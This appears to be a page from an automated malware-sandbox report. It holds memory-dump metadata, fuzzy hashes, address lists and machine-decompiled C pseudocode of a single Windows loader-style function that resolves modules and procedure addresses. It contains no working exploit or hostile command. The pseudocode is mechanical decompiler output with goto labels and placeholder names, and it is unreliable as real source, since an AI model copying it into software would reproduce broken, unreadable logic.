0x0467457b
0x04674582
0x046be1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x04674588
0x04674588
0x0467458c
0x046be1c4
0x046be1c4
0x00000000
0x04674592
0x04674592
0x04674599
0x046be1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0467459f
0x0467459f
0x046745a3
0x046be1d7
0x046be1e4
0x00000000
0x046745a9
0x046745a9
0x046745b0
0x046be1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x046745b6
0x046745b6
0x046745b6
0x00000000
0x046745b6
0x046745b0
0x046745a3
0x04674599
0x0467458c
0x04674582
0x00000000
0x00000000
0x00000000
0x00000000
0x046741f4
0x0467423e
0x04674241
0x046745c0
0x046745c4
0x00000000
0x046745ca
0x046745ca
0x00000000
0x046be207
0x046be20f
0x00000000
0x00000000
0x00000000
0x00000000
0x046745d1
0x00000000
0x00000000
0x046745ca
0x00000000
0x04674247
0x04674247
0x04674247
0x04674249
0x04674249
0x04674249
0x04674251
0x04674251
0x04674257
0x0467425f
0x0467426e
0x04674270
0x0467427a
0x046be219
0x046be219
0x04674280
0x04674282
0x04674456
0x046745ea
0x00000000
0x046745f0
0x046be223
0x00000000
0x046be223
0x0467445c
0x0467445c
0x00000000
0x0467445c
0x00000000
0x04674288
0x0467428c
0x046be298
0x04674292
0x04674292
0x0467429e
0x046742a3
0x046742a7
0x046742ac
0x046be22d
0x046742b2
0x046742b2
0x046742b9
0x046742bc
0x046742c2
0x046742ca
0x046742cd
0x046742cd
0x046742d4
0x0467433f
0x0467433f
0x046742d6
0x046742d6
0x046742d9
0x046742dd
0x046742eb
0x046be23a
0x046742f1
0x04674305
0x0467430d
0x04674315
0x04674318
0x0467431f
0x04674322
0x0467432e
0x0467433b
0x0467433b
0x00000000
0x0467432e
0x046742eb
0x0467434c
0x0467434e
0x04674352
0x04674359
0x0467435e
0x04674361
0x0467436e
0x0467438a
0x0467438e
0x04674396
0x0467439e
0x046743a1
0x046743ad
0x046743bb
0x046743bb
0x046743ad
0x0467436e
0x046743bf
0x046743c5
0x04674463
0x04674463
0x046743ce
0x046743d5
0x046743d9
0x046743df
0x04674475
0x04674479
0x04674491
0x04674491
0x04674479
0x046743e5
0x046743eb
0x046743f4
0x046743f6
0x046743f9
0x046743fc
0x046743ff
0x046744e8
0x046744ed
0x046744f3
0x046be247
0x00000000
0x046744f9
0x04674504
0x04674508
0x0467450f
0x046be269
0x00000000
0x04674515
0x04674519
0x04674531
0x04674534
0x04674537
0x0467453e
0x04674541
0x0467454a
0x046be255
0x046be255
0x046be25b
0x046be25e
0x046be261
0x046be261
0x04674555
0x04674559
0x0467455d
0x046be26d
0x046be270
0x046be274
0x046be27a
0x046be27d
0x046be28e
0x046be28e
0x04674563
0x04674563
0x04674569
0x04674569
0x00000000
0x0467455d
0x0467450f
0x00000000
0x046744f3
0x046743ff
0x04674405
0x04674405
0x04674405
0x046742ac
0x0467428c
0x04674282
0x04674407
0x0467440d
0x046be2af
0x046be2af
0x04674413
0x04674413
0x00000000
0x046741d4
0x00000000
0x046741c3
0x046741bd
0x04674415
0x04674415
0x04674416
0x04674417
0x04674429
0x0467416e
0x0467416e
0x04674175
0x04674498
0x0467449f
0x046be12d
0x00000000
0x046be133
0x00000000
0x046be133
0x046744a5
0x046744a5
0x046744aa
0x00000000
0x046744bb
0x046744ca
0x046744d6
0x046744d7
0x046744d8
0x046744e3
0x046744e3
0x046744aa
0x0467417b
0x0467417b
0x0467417b
0x00000000
0x0467417b
0x04674175
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a08aea7dd4ed0530695397ffedd87b8a67d8bb2cb5b06c3d1fa0134a702b133
Instruction ID: cfa5ac37031cc7abdc2eec1fcca281bcc4d6c0609a4d00652bb35095db3f970e
Opcode Fuzzy Hash: 1a08aea7dd4ed0530695397ffedd87b8a67d8bb2cb5b06c3d1fa0134a702b133
Instruction Fuzzy Hash: CFF17C706083118BD724CF29C484A7AB7E1EF98758F15492EF496CB350FB35E892DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0466D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0466D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x474d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04666600(0x47452d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4747b9c; // 0x0
							_t281 = L04674620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0469F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4747b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x4747b8c; // 0x2881d40
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E04672280(_t200, 0x47484d8);
									_t277 =  *0x47485f4;
									_t351 =  *0x47485f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x2882158
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0466FFB0(_t287, _t353, 0x47484d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E046ACC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04666600(0x47452d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04667926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x474b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E046DE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4748472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x474b218; // 0x0
														asm("ror edi, cl");
														 *0x474b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04672280(_t250, 0x47484d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04693898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0466FFB0(_t293, _t353, 0x47484d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E046937F5(_t353, 0);
																}
																E04690413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04689B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E046802D6(_t174);
																}
																L046777F0( *0x4747b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0468C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0466EC7F(_t353);
										L046819B8(_t287, 0, _t353, 0);
										_t200 = E0465F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0469B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x474b2f8; // 0x530000
									if((_t206 |  *0x474b2fc) == 0 || ( *0x474b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x474b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04706B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04706AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0466E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0466EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04699730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0466E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04668F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04693C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0466d5f2
0x0466d5f5
0x0466d5f5
0x0466d5fd
0x0466d600
0x0466d60a
0x0466d60d
0x0466d617
0x0466d61d
0x0466d627
0x0466d62e
0x0466d911
0x0466d913
0x00000000
0x0466d919
0x0466d919
0x0466d919
0x0466d634
0x0466d634
0x0466d634
0x0466d634
0x0466d640
0x0466d8bf
0x00000000
0x0466d646
0x0466d646
0x0466d64d
0x0466d652
0x046bb2fc
0x046bb2fc
0x046bb302
0x046bb33b
0x046bb341
0x00000000
0x046bb304
0x046bb304
0x046bb319
0x046bb31e
0x046bb324
0x046bb326
0x046bb332
0x046bb347
0x046bb34c
0x046bb351
0x046bb35a
0x00000000
0x046bb328
0x046bb328
0x00000000
0x046bb328
0x046bb326
0x0466d658
0x0466d658
0x0466d65b
0x0466d665
0x00000000
0x0466d66b
0x0466d66b
0x0466d66b
0x0466d66b
0x0466d66d
0x0466d672
0x0466d67a
0x00000000
0x00000000
0x0466d680
0x0466d686
0x0466d8ce
0x0466d8d4
0x0466d8dd
0x0466d8e0
0x0466d68c
0x0466d691
0x0466d69d
0x0466d6a2
0x0466d6a7
0x0466d6b0
0x0466d6b5
0x0466d6e0
0x0466d6b7
0x0466d6b7
0x0466d6b9
0x0466d6b9
0x0466d6bb
0x0466d6bd
0x0466d6ce
0x0466d6d0
0x0466d6d2
0x046bb363
0x046bb365
0x00000000
0x046bb36b
0x00000000
0x046bb36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0466d6bf
0x0466d6bf
0x0466d6e5
0x0466d6e7
0x0466d6e9
0x0466d6ec
0x0466d6ec
0x0466d6ef
0x0466d6f5
0x0466d6f9
0x0466d6fb
0x0466d6fd
0x0466d701
0x0466d703
0x0466d70a
0x0466d70a
0x0466d701
0x0466d710
0x0466d710
0x0466d6c1
0x0466d6c1
0x0466d6c6
0x046bb36d
0x046bb36f
0x00000000
0x046bb375
0x046bb375
0x046bb375
0x00000000
0x046bb375
0x00000000
0x0466d6cc
0x0466d6d8
0x0466d6d8
0x0466d6d8
0x00000000
0x0466d6c6
0x0466d6bf
0x00000000
0x0466d6da
0x0466d6da
0x0466d716
0x0466d71b
0x0466d720
0x0466d726
0x0466d726
0x0466d72d
0x00000000
0x0466d733
0x0466d739
0x0466d742
0x0466d750
0x0466d758
0x0466d764
0x0466d776
0x0466d77a
0x0466d783
0x0466d928
0x0466d92c
0x0466d93d
0x0466d944
0x0466d94f
0x0466d954
0x0466d956
0x0466d95f
0x0466d961
0x0466d973
0x0466d973
0x0466d956
0x0466d944
0x0466d92c
0x0466d78b
0x046bb394
0x0466d791
0x0466d798
0x046bb3a3
0x046bb3bb
0x046bb3bb
0x0466d7a5
0x0466d866
0x0466d870
0x0466d884
0x0466d892
0x0466d898
0x0466d89e
0x0466d8a0
0x0466d8a6
0x0466d8ac
0x0466d8ae
0x0466d8b4
0x0466d8b4
0x0466d8ae
0x0466d7a5
0x0466d78b
0x0466d7b1
0x046bb3c5
0x046bb3c5
0x0466d7c3
0x0466d7ca
0x0466d7e5
0x0466d7eb
0x0466d8eb
0x0466d8ed
0x00000000
0x0466d8f3
0x0466d8f3
0x0466d8f3
0x00000000
0x0466d8ed
0x0466d7cc
0x0466d7cc
0x0466d7d2
0x00000000
0x0466d7d4
0x0466d7d4
0x0466d7d7
0x0466d7df
0x046bb3d4
0x046bb3d9
0x046bb3dc
0x046bb3dc
0x046bb3df
0x046bb3e2
0x046bb468
0x046bb46d
0x046bb46f
0x046bb46f
0x046bb475
0x0466d8f8
0x0466d8f9
0x0466d8fd
0x046bb3e8
0x046bb3e8
0x046bb3eb
0x046bb3ed
0x00000000
0x046bb3ef
0x046bb3ef
0x046bb3f1
0x046bb3f4
0x046bb3fe
0x046bb404
0x046bb409
0x046bb40e
0x046bb410
0x046bb410
0x046bb414
0x046bb414
0x046bb41b
0x046bb420
0x046bb423
0x046bb425
0x046bb427
0x046bb42a
0x046bb42d
0x046bb42d
0x046bb42a
0x046bb432
0x046bb436
0x046bb438
0x046bb43b
0x046bb43b
0x046bb449
0x046bb44e
0x046bb454
0x046bb458
0x046bb458
0x046bb45d
0x00000000
0x046bb45d
0x046bb3ed
0x00000000
0x00000000
0x00000000
0x0466d7df
0x0466d7d2
0x0466d7ca
0x046bb37c
0x046bb37e
0x046bb385
0x046bb38a
0x00000000
0x046bb38a
0x0466d742
0x0466d7f1
0x0466d7f8
0x046bb49b
0x046bb49b
0x0466d800
0x0466d837
0x0466d843
0x0466d845
0x0466d847
0x0466d84a
0x0466d84b
0x0466d84e
0x0466d857
0x0466d802
0x0466d802
0x0466d80d
0x00000000
0x0466d818
0x0466d818
0x0466d824
0x0466d831
0x046bb4a5
0x046bb4ab
0x046bb4b3
0x046bb4b8
0x046bb4bb
0x00000000
0x046bb4c1
0x046bb4c1
0x046bb4c8
0x00000000
0x046bb4ce
0x046bb4d4
0x046bb4e1
0x046bb4e3
0x046bb4e5
0x00000000
0x046bb4eb
0x046bb4f0
0x046bb4f2
0x0466dac9
0x0466dacc
0x0466dacf
0x0466dad1
0x0466dd78
0x0466dd78
0x0466dcf2
0x00000000
0x0466dad7
0x0466dad9
0x0466dadb
0x00000000
0x00000000
0x0466dae1
0x0466dae1
0x0466dae4
0x0466dae6
0x046bb4f9
0x046bb4f9
0x046bb500
0x0466daec
0x0466daec
0x0466daf5
0x0466daf8
0x0466dafb
0x0466db03
0x0466db11
0x0466db16
0x0466db19
0x0466db1b
0x046bb52c
0x046bb531
0x046bb534
0x0466db21
0x0466db21
0x0466db24
0x0466dcd9
0x0466dce2
0x0466dce5
0x0466dd6a
0x0466dd6d
0x00000000
0x0466dd73
0x046bb51a
0x046bb51c
0x046bb51f
0x046bb524
0x00000000
0x046bb524
0x0466dce7
0x0466dce7
0x0466dce7
0x00000000
0x0466dce7
0x00000000
0x0466db2a
0x0466db2c
0x0466db31
0x0466db33
0x0466db36
0x0466db39
0x0466db3b
0x0466db66
0x0466db66
0x0466db3d
0x0466db3d
0x0466db3e
0x0466db46
0x0466db47
0x0466db49
0x0466db4c
0x0466db53
0x0466db55
0x0466db58
0x0466db5a
0x046bb50a
0x046bb50f
0x046bb512
0x0466db60
0x0466db60
0x0466db63
0x0466db63
0x00000000
0x0466db63
0x0466db5a
0x0466db3b
0x0466db24
0x0466db69
0x0466db69
0x0466db6c
0x0466db6f
0x0466db74
0x046bb557
0x046bb557
0x046bb55e
0x0466db7a
0x0466db7c
0x0466db7f
0x0466db82
0x0466db85
0x00000000
0x0466db8b
0x0466db8b
0x0466db8d
0x0466db9b
0x0466db9b
0x0466db9d
0x0466dba0
0x0466dba2
0x0466dba4
0x0466dba7
0x0466dba9
0x0466dbae
0x0466dbae
0x0466dbb1
0x0466dbb4
0x0466dbb4
0x0466dbb7
0x0466dbba
0x0466dcd2
0x0466dcd4
0x00000000
0x0466dbc0
0x0466dbc0
0x0466dbd2
0x0466dbd7
0x0466dbda
0x0466dbdd
0x0466dbdf
0x00000000
0x0466dbe5
0x0466dbe5
0x0466dbee
0x0466dbf1
0x046bb541
0x046bb544
0x00000000
0x046bb546
0x046bb546
0x00000000
0x046bb546
0x0466dbf7
0x0466dbf7
0x0466dbfd
0x0466dbfd
0x0466dbff
0x0466dc0b
0x0466dc15
0x0466dc1b
0x0466dc1d
0x0466dc21
0x0466dc21
0x0466dc23
0x0466dc23
0x0466dc26
0x0466dc29
0x0466dc2b
0x00000000
0x00000000
0x0466dc31
0x0466dc34
0x0466dc36
0x0466dcbf
0x0466dcbf
0x0466dcc2
0x00000000
0x0466dc3c
0x0466dc41
0x0466dc43
0x00000000
0x0466dc45
0x0466dc45
0x0466dc47
0x00000000
0x0466dc4d
0x0466dc4d
0x0466dc50
0x0466dc52
0x0466dc55
0x0466dcfa
0x0466dcfe
0x0466dd08
0x0466dd0a
0x0466dd0c
0x00000000
0x0466dd12
0x0466dd15
0x0466dd2d
0x0466dd2f
0x0466dd32
0x0466dd35
0x00000000
0x0466dd35
0x0466dc5b
0x0466dc5b
0x0466dc5e
0x0466dc61
0x0466dc64
0x0466dc67
0x0466dc67
0x0466dc6a
0x0466dc6c
0x0466dc8e
0x0466dc8e
0x0466dc91
0x0466dc93
0x0466dcce
0x0466dcce
0x0466dc95
0x0466dc9c
0x0466dc6e
0x0466dc72
0x0466dc75
0x0466dc77
0x0466dc79
0x046bb551
0x046bb551
0x00000000
0x0466dc7f
0x0466dc7f
0x0466dc81
0x00000000
0x0466dc83
0x0466dc86
0x0466dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0466dc88
0x0466dc81
0x0466dc79
0x0466dc6c
0x0466dc55
0x0466dc47
0x0466dc43
0x00000000
0x0466dc36
0x0466dc23
0x00000000
0x0466dbff
0x0466dbf1
0x0466dbdf
0x0466db8f
0x0466db92
0x0466db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0466db95
0x0466db8d
0x0466db85
